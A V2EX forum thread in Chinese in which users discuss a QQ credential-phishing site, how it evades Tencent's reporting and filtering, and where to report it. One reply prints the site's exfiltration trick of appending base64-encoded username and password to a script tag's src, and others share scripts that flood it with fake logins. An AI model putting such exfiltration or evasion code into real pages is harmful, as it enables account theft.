腾讯到现在都不能自动识别出这种低端钓鱼盗号网站么

V2EX = way to explore

V2EX 是一个关于分享和探索的地方

现在注册

已注册用户请登录

工单节点使用指南

• 请用平和的语言准确描述你所遇到的问题

• 厂商的技术支持和你一样也是有喜怒哀乐的普通人类，尊重是相互的

• 如果是关于 V2EX 本身的问题反馈，请使用反馈节点

这是一个创建于 2148 天前的主题，其中的信息可能已经有所发展或是发生改变。

截图： https://i.loli.net/2018/12/22/5c1d0f003b937.png

链接是： http://sundonggen.com 不要在里面输入帐号密码！！

破网站连个 https 都没有，输入时弹出的键盘还是 iOS 键盘，让我一个用 Android 的情何以堪

不管输入什么第一次登录都提示错误

如果你在 QQ 内置浏览器打开，然后按右上角举报，他会在你按右上角时跳转到腾讯官方的一个页面，这样举报时自动填写的链接地址就是腾讯官方页面地址，就举报不到它

如果电脑访问，即使用 chrome 开发者工具模拟 iPhone6 或 pixel 2，也会跳转腾讯官方的一个页面

Whois 查询到域名在阿里云注册，阿里云的举报还居然需要注册登录或者上传身份证明

腾讯拦截不了，想举报一下做一点微小的工作也不行。

腾讯

页面

右上角

45 条回复 • 2018-12-24 10:13:00 +08:00

boris1993

2018-12-22 00:50:11 +08:00 via Android

孙冻根.com ？？？

v2016

2018-12-22 00:57:20 +08:00 via iPhone

我去研究研究希望别挂掉

orangeade

2018-12-22 00:59:28 +08:00 via Android

腾讯只会屏蔽没备案网站

C2G

2018-12-22 01:22:05 +08:00 via Android

测试真伪很简单 QQ 号输入 10001 如果提示不是正确 QQ 号一定是假的反之也不一定是真的

banshicy

2018-12-22 01:36:04 +08:00 via Android

还有这个，查域名也是阿里云注册的，现在人都这么屌了么，， [提示] 不要输入任何信息 http://zhijianjimo.com

Drumming

2018-12-22 01:50:14 +08:00

没了

boris1993

2018-12-22 01:57:49 +08:00

@Drumming #6 得用手机，电脑打开自动跳到一个图片上

mario85

2018-12-22 04:07:23 +08:00 via iPhone

chrome 设置 ua 没

zyqf

2018-12-22 04:14:02 +08:00 via Android

我之前写了个脚本，随机生成 QQ 号和密码提交上去。放在几个服务器上跑了两天，提交了大概有一两百万条吧。

xeaglex

2018-12-22 05:50:08 +08:00

@zyqf 你这就很强了 23333

zturns

2018-12-22 06:37:23 +08:00 via Android

腾讯只看钱，备案的网站有时候还没没备案的有用。创宇云天天打电话

xanthu

2018-12-22 07:20:22 +08:00 via Android

上次碰个 https 的钓鱼网站把身份证和手机信息泄露了，贼气一点办法都没得

HXM

2018-12-22 07:38:57 +08:00 via Android

@banshicy 感觉像一套源码，弹出的键盘都一模一样

@mario85 对，应该是做了 UA 判断

@orangeade 这种网站也居然也敢光明正大的备案。。。

@xanthu 老哥，https 也不能证明就是官方网站，事关重要账号的网站最好点到安全信息里看看证书详情

xuecan

2018-12-22 08:30:10 +08:00 via iPhone

那就去举报备案

galikeoy

2018-12-22 09:04:27 +08:00

@zyqf 哈哈哈哈哈

AlisaDestiny

2018-12-22 09:14:18 +08:00

简单分析了一下。这人还挺狡猾的，没有通过常规的 ajax 的方式提交，而是通过 js 动态创建 script 标签，在指定 src 的时候把用户名和密码当做参数附加在后面：sundonggen.com/user.js?token=encodeURIComponent(btoa(JSON.stringify({ u: "你的 QQ",p: "你的密码"}))));然后返回的是正常的 jquery 库代码。

opengps

2018-12-22 09:41:22 +08:00 via Android

我见过最牛逼的钓鱼网站，自带举报入口，让那些举报的人找不对入口

580a388da131

2018-12-22 10:23:45 +08:00 via iPhone

做的好精致

LanFomalhaut

2018-12-22 10:27:56 +08:00

实际使用中还有腾讯的“任意跳转漏洞”等等在利用: )
甚至有表现为 QQ 打开后下拉上方 URL 显示为腾讯的某官方域名

openbsd

2018-12-22 10:55:11 +08:00

鹅厂的回复一般是：您的举报证据不足，如果您有了经济损失啥的，请报警，所以说，免费的东西真心有点坑

winglight2016

2018-12-22 11:07:39 +08:00

这钓鱼网站居然还实现了 iOS 软键盘？很下功夫啊

agdhole

2018-12-22 11:10:58 +08:00 via Android

我的站主域名和所有子域名全部被腾讯标红了，已备案已实名，去申述说封一个月才解，主站红就算了，首页 502 停用的 API 也被封

Les1ie

2018-12-22 11:25:16 +08:00

目前大部分的识别恶意网站不是通过网站内容来识别，而是通过恶意网站列表来识别的，恶意列表是志愿者维护的，维护列表的更新需要时间。

MineDog

2018-12-22 11:53:33 +08:00

似乎是通过 navigator.platform 来区别展示不同页面的

admingyu

2018-12-22 15:09:26 +08:00

根据 AlisaDestiny 的分析
抽空简单写了个脚本,提交假的账号密码
https://github.com/Admingyu/against-fraud/blob/master/qq_fraud_sundonggen.com.py

yuanshuai1995

2018-12-22 17:14:51 +08:00

@admingyu #25 这个怎么操作的我也想帮帮忙

admingyu

2018-12-22 20:19:14 +08:00

@yuanshuai1995 python3.6 环境文件所在文件夹打开终端直接输入 Python ./qq_fraud_sundonggen.com.py 然后回车就行

rogwan

2018-12-22 20:27:22 +08:00 via iPhone

这个钓鱼网站不低端了，超过很多人的水平啦😅

alfchin

2018-12-22 22:54:06 +08:00 via Android

楼主可以去 12321 举报，顺便去工信部举报阿里云给涉嫌诈骗信息的举报设置不恰当的障碍

EarthChild

2018-12-22 23:04:31 +08:00

之前几天有一个 loveprisoner.cn 的钓鱼网站我 whois 之后找注册商发邮件说域名滥用让他们处理了，半天就解决了。其实找域名注册商比较好用，或者报警。其他途径太慢了。

labnotok

2018-12-22 23:06:11 +08:00 via Android

不是不能，是不想

钓鱼（诈骗）、色情不是底线，
Xin Yue 这种才是

lzyuid

2018-12-22 23:36:39 +08:00

sundonggen.com 企业备案？
并且分享到群里后，会跳到腾讯微众的活动

aliipay

2018-12-23 01:19:10 +08:00

@admingyu 已经顺手跑了几分钟。
UA 随机来几个是不是更好

HXM

2018-12-23 01:21:23 +08:00 via Android

@EarthChild 我给阿里云发邮件了，他自动回复让我到举报页面举报，举报页面需要登录。。。

klii

2018-12-23 01:48:08 +08:00

https://qzonestyle.gtimg.cn/aoi/sola/20180612182915_oC2G8CAcEv.jpg

我点了后跳转了这个，话说他是如何使用的微信的 ssl

ochatokori

2018-12-23 03:38:27 +08:00 via Android

这键盘是用来搞笑的吧

mytsing520

2018-12-23 03:57:53 +08:00

QQ 邮箱曾经实现过智能识别，用于腾讯安全的大数据，现在也在用。

但问题是，要识别这些内容是否是安全的内容，他就要到这个 URL 上去模拟访问一次，万一遇到了只允许点击一次的链接，如激活账号这种，当然点击后直接激活的没关系，万一点击后还要填写信息的，用户就要骂娘了。

所以你很多情况下会看到腾讯的服务器访问了你网站上部分页面的记录。多分析下 refer，就能发现。

leaves7i

2018-12-23 04:36:35 +08:00 via Android

“论安卓设备使用 iPhone UA 的必要性”

rogwan

2018-12-23 08:46:30 +08:00 via iPhone

@mytsing520 这种情况很容易造成恶意注册。我有短号邮箱地址，收到恶意注册第三方 APP 的邮件，自己没理睬，但是被激活啦。然后就一直各种垃圾推送

looseChen

2018-12-23 09:12:22 +08:00

钓鱼钓过去了也没啥用把，现在不是一般 qq 都有设备锁嘛

EarthChild

2018-12-23 10:36:55 +08:00

@HXM #34 那不行就去 icann 投诉阿里不负责任

yuanshuai1995

2018-12-23 12:21:23 +08:00

网站已经挂掉了吧

2018-12-23 14:15:49 +08:00

腾讯的举报大部分时候都是没有用的，那些发图片格式的违法的广告，举报都是不成功的。

scientist

2018-12-23 19:23:24 +08:00

举报了个带钓鱼网站二维码的群发图片，腾讯判定举报不成功。

admingyu

2018-12-24 10:13:00 +08:00

@scientist 发兼职广告的举报之后发邮件告诉我那个人确认存在违规行为已被封号,过两天那个人还是能给我发广告,一样的